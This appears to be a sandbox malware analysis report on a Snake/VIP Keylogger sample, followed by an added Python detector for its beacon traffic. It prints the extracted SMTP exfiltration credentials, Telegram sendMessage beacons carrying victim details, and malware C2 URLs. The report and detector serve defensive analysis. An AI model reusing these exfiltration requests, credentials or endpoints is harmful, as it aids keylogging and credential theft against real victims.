
Windows Analysis Report
z1newpo.exe

Overview

General Information

Sample name: z1newpo.exe
Analysis ID: 1513179
MD5: c087116b5a47a54e5dd272162fd87b3b
SHA1: 71eb7a31ed81367c95563f6d4aadfb6ea028b997
SHA256: 5988ba6bf97c1b33f469edfca96b98c35d2054f2ce49d8e065d23250a241a3d0
Tags: exe

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • z1newpo.exe (PID: 2608 cmdline: "C:\Users\user\Desktop\z1newpo.exe" MD5: C087116B5A47A54E5DD272162FD87B3B)
    • name.exe (PID: 788 cmdline: "C:\Users\user\Desktop\z1newpo.exe" MD5: C087116B5A47A54E5DD272162FD87B3B)
      • RegSvcs.exe (PID: 3636 cmdline: "C:\Users\user\Desktop\z1newpo.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 5616 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • name.exe (PID: 6540 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: C087116B5A47A54E5DD272162FD87B3B)
      • RegSvcs.exe (PID: 6480 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "wethem@aklaneah-sa.com", "Password": "Password:  )NYyffR0   ", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "wethem@aklaneah-sa.com", "Password": "Password:  )NYyffR0   ", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000003.00000002.3688609885.00000000027A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
Source | Rule | Description | Author | Strings
3.2.RegSvcs.exe.370000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
3.2.RegSvcs.exe.370000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
3.2.RegSvcs.exe.370000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
3.2.RegSvcs.exe.370000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
3.2.RegSvcs.exe.370000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2d5eb:$a1: get_encryptedPassword
  • 0x2d8f8:$a2: get_encryptedUsername
  • 0x2d409:$a3: get_timePasswordChanged
  • 0x2d504:$a4: get_passwordField
  • 0x2d601:$a5: set_encryptedPassword
  • 0x2ec8b:$a7: get_logins
  • 0x2ebee:$a10: KeyLoggerEventArgs
  • 0x2e853:$a11: KeyLoggerEventArgsEventHandler

                    System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 5616, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 208.91.198.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 3636, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49732
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 5616, ProcessName: wscript.exe

                    Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 788, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-18T15:26:05.694557+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49701 | 188.114.96.3 | 443 | TCP
2024-09-18T15:26:07.306113+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49703 | 188.114.96.3 | 443 | TCP
2024-09-18T15:26:09.776818+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49705 | 188.114.96.3 | 443 | TCP
2024-09-18T15:26:11.401270+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49707 | 188.114.96.3 | 443 | TCP
2024-09-18T15:26:15.101822+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49711 | 188.114.96.3 | 443 | TCP
2024-09-18T15:26:17.610438+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49715 | 188.114.96.3 | 443 | TCP
2024-09-18T15:26:18.618702+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49719 | 188.114.96.3 | 443 | TCP
2024-09-18T15:26:20.863212+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49723 | 188.114.96.3 | 443 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-18T15:26:04.128767+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49699 | 132.226.8.169 | 80 | TCP
2024-09-18T15:26:05.113363+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49699 | 132.226.8.169 | 80 | TCP
2024-09-18T15:26:06.597534+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49702 | 132.226.8.169 | 80 | TCP
2024-09-18T15:26:17.097628+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49713 | 132.226.8.169 | 80 | TCP
2024-09-18T15:26:18.050710+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49713 | 132.226.8.169 | 80 | TCP
2024-09-18T15:26:19.628818+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49722 | 132.226.8.169 | 80 | TCP


                    AV Detection

Source: z1newpo.exe | Avira: detected
Source: http://aborters.duckdns.org:8081 | URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 | URL Reputation: Label: malware
Source: C:\Users\user\AppData\Local\directory\name.exe | Avira: detection malicious, Label: HEUR/AGEN.1321293
Source: 0000000D.00000002.3689181352.0000000002631000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "wethem@aklaneah-sa.com", "Password": "Password: )NYyffR0 ", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source: 12.2.name.exe.12d0000.1.raw.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "wethem@aklaneah-sa.com", "Password": "Password: )NYyffR0 ", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source: C:\Users\user\AppData\Local\directory\name.exe | ReversingLabs: Detection: 73%
Source: z1newpo.exe | ReversingLabs: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\directory\name.exe | Joe Sandbox ML: detected
Source: z1newpo.exe | Joe Sandbox ML: detected

                    Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: z1newpo.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49700 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49716 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49739 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP | source: name.exe, 00000002.00000003.1256660434.0000000004550000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.1255416587.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000C.00000003.1393904263.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000C.00000003.1393272739.0000000004640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: name.exe, 00000002.00000003.1256660434.0000000004550000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.1255416587.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000C.00000003.1393904263.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000C.00000003.1393272739.0000000004640000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B

                    Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: global traffic | TCP traffic: 192.168.2.7:49732 -> 208.91.198.143:587
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2002:45:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2004:52:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox View | IP Address: 132.226.8.169
                    Source: Joe Sandbox View | IP Address: 208.91.198.143
                    Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS
                    Source: Joe Sandbox View | ASN Name: TELEGRAMRU
                    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                    Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknown | DNS query: name: checkip.dyndns.org
                    Source: unknown | DNS query: name: reallyfreegeoip.org
                    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 132.226.8.169:80
                    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49722 -> 132.226.8.169:80
                    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49713 -> 132.226.8.169:80
                    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49699 -> 132.226.8.169:80
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49703 -> 188.114.96.3:443
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49715 -> 188.114.96.3:443
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49707 -> 188.114.96.3:443
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 188.114.96.3:443
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49705 -> 188.114.96.3:443
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49711 -> 188.114.96.3:443
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49723 -> 188.114.96.3:443
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49719 -> 188.114.96.3:443
                    Source: global traffic | TCP traffic: 192.168.2.7:49732 -> 208.91.198.143:587
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive (observed 14 times)
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org (observed 6 times)
                    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49700 version: TLS 1.0
                    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49716 version: TLS 1.0
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (observed 4 times)
                    Source: C:\Users\user\Desktop\z1newpo.exe | Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile, 0_2_004422FE
                    Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive (observed 4 times)
                    Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org (observed 8 times)
                    Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2002:45:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive (observed 6 times)
                    Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2004:52:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive (observed 14 times)
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org (observed 6 times)
                    Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                    Source: global traffic | DNS traffic detected: DNS query: us2.smtp.mailhostbox.com
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Wed, 18 Sep 2024 13:26:22 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Wed, 18 Sep 2024 13:26:35 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
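The request chain recorded above is the part of this traffic that is easiest to alert on: a GET to checkip.dyndns.org with a legacy .NET 1.0-era User-Agent, a GET to reallyfreegeoip.org/xml/<public ip>, then a GET to api.telegram.org/bot<token>/sendMessage carrying the host name, timestamp and country in the URL-encoded text parameter. Two details matter for triage. First, in every captured request the bot token and chat_id are empty (/bot/sendMessage?chat_id=&text=...), so Telegram cannot deliver the message; the 404 Not Found responses with a 55-byte JSON body are consistent with what api.telegram.org returns for a path without a valid token. Second, the sample also opens SMTP submission (port 587) to us2.smtp.mailhostbox.com, so mail is the other exfiltration channel to watch. The Python below is an added example, not code from the report or from the malware: it decodes the text parameter and flags a client only when all three stages appear from the same source. The proxy-log layout (client, method, host, path, quoted User-Agent) is an assumption, and the log lines are constructed, reusing the report's URL-encoded Telegram text.

```python
"""Spot the IP-check -> geolocation -> Telegram sendMessage chain in
proxy-style HTTP logs and decode what the Telegram message carries.

Added example, not code from the Joe Sandbox report or from the malware.
The 'client method host path "user-agent"' layout is an assumed proxy
format; SAMPLE_LOG is constructed to mirror the report's requests.
"""
import re
from urllib.parse import parse_qs, urlsplit

IP_CHECK_HOST = "checkip.dyndns.org"
GEOIP_HOST = "reallyfreegeoip.org"
TELEGRAM_HOST = "api.telegram.org"
# Legacy User-Agent the sample sends to checkip.dyndns.org (taken from the report).
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"

LOG_RE = re.compile(
    r'^(?P<client>\S+) (?P<method>\S+) (?P<host>\S+) (?P<path>\S+) "(?P<ua>[^"]*)"$'
)
TELEGRAM_SEND = re.compile(r"^/bot(?P<token>[^/]*)/sendMessage$")

# Constructed sample log (not from the report). Line 3 reuses the report's
# URL-encoded Telegram text; 192.168.2.9 is a benign host that also looks
# up its public IP, to show that one stage alone does not trigger.
SAMPLE_LOG = """\
192.168.2.7 GET checkip.dyndns.org / "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
192.168.2.7 GET reallyfreegeoip.org /xml/8.46.123.33 "-"
192.168.2.7 GET api.telegram.org /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2004:52:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20%5D "-"
192.168.2.9 GET checkip.dyndns.org / "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
192.168.2.9 GET www.example.com /index.html "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
"""


def decode_telegram_beacon(path):
    """Decode a /bot<token>/sendMessage request path.

    Returns None when the path is not a sendMessage call, otherwise a dict
    with the token, chat_id, the 'Key: value' fields the malware packs into
    the CRLF-separated text parameter, and any free-text notes.
    """
    parts = urlsplit(path)
    m = TELEGRAM_SEND.match(parts.path)
    if not m:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    text = qs.get("text", [""])[0]
    fields, notes = {}, []
    for raw in text.split("\r\n"):
        line = raw.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")
        if sep and not line.startswith("["):
            fields[key.strip()] = value.strip()
        else:
            notes.append(line)
    return {
        "token": m.group("token"),
        "chat_id": qs.get("chat_id", [""])[0],
        "fields": fields,
        "notes": notes,
    }


def detect_chain(log_text):
    """Group requests per client and report which stages each completed.

    A client is flagged only when all three stages are present, which keeps
    ordinary 'what is my IP' lookups from firing the alert.
    """
    seen = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        state = seen.setdefault(rec["client"], {"stages": [], "beacon": None})
        if rec["host"] == IP_CHECK_HOST and rec["ua"] == LEGACY_UA:
            stage = "ip_check"
        elif rec["host"] == GEOIP_HOST and rec["path"].startswith("/xml/"):
            stage = "geoip"
        elif rec["host"] == TELEGRAM_HOST:
            beacon = decode_telegram_beacon(rec["path"])
            if beacon is None:
                continue
            state["beacon"] = beacon
            stage = "telegram"
        else:
            continue
        if stage not in state["stages"]:
            state["stages"].append(stage)

    results = {}
    for client, state in seen.items():
        complete = {"ip_check", "geoip", "telegram"} <= set(state["stages"])
        results[client] = {
            "stages": state["stages"],
            "flagged": complete,
            "beacon": state["beacon"],
            # An empty token means the builder config was blank; Telegram
            # cannot route the message and the operator gets nothing here.
            "token_configured": bool(state["beacon"] and state["beacon"]["token"]),
        }
    return results


if __name__ == "__main__":
    for client, r in detect_chain(SAMPLE_LOG).items():
        print(client, r["stages"], "FLAGGED" if r["flagged"] else "-")
        if r["beacon"]:
            print("  token configured:", r["token_configured"])
            print("  beacon fields:", r["beacon"]["fields"])
```

Run against real proxy or Zeek http.log output by adapting LOG_RE; the stage logic and the decoder do not depend on the log format. The decoder deliberately keeps the token separate from the rest of the path, because when a token is present it is the one value worth reporting to Telegram for takedown.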
                    Source: RegSvcs.exe, 00000003.00000002.3688609885.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.3689181352.0000000002823000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
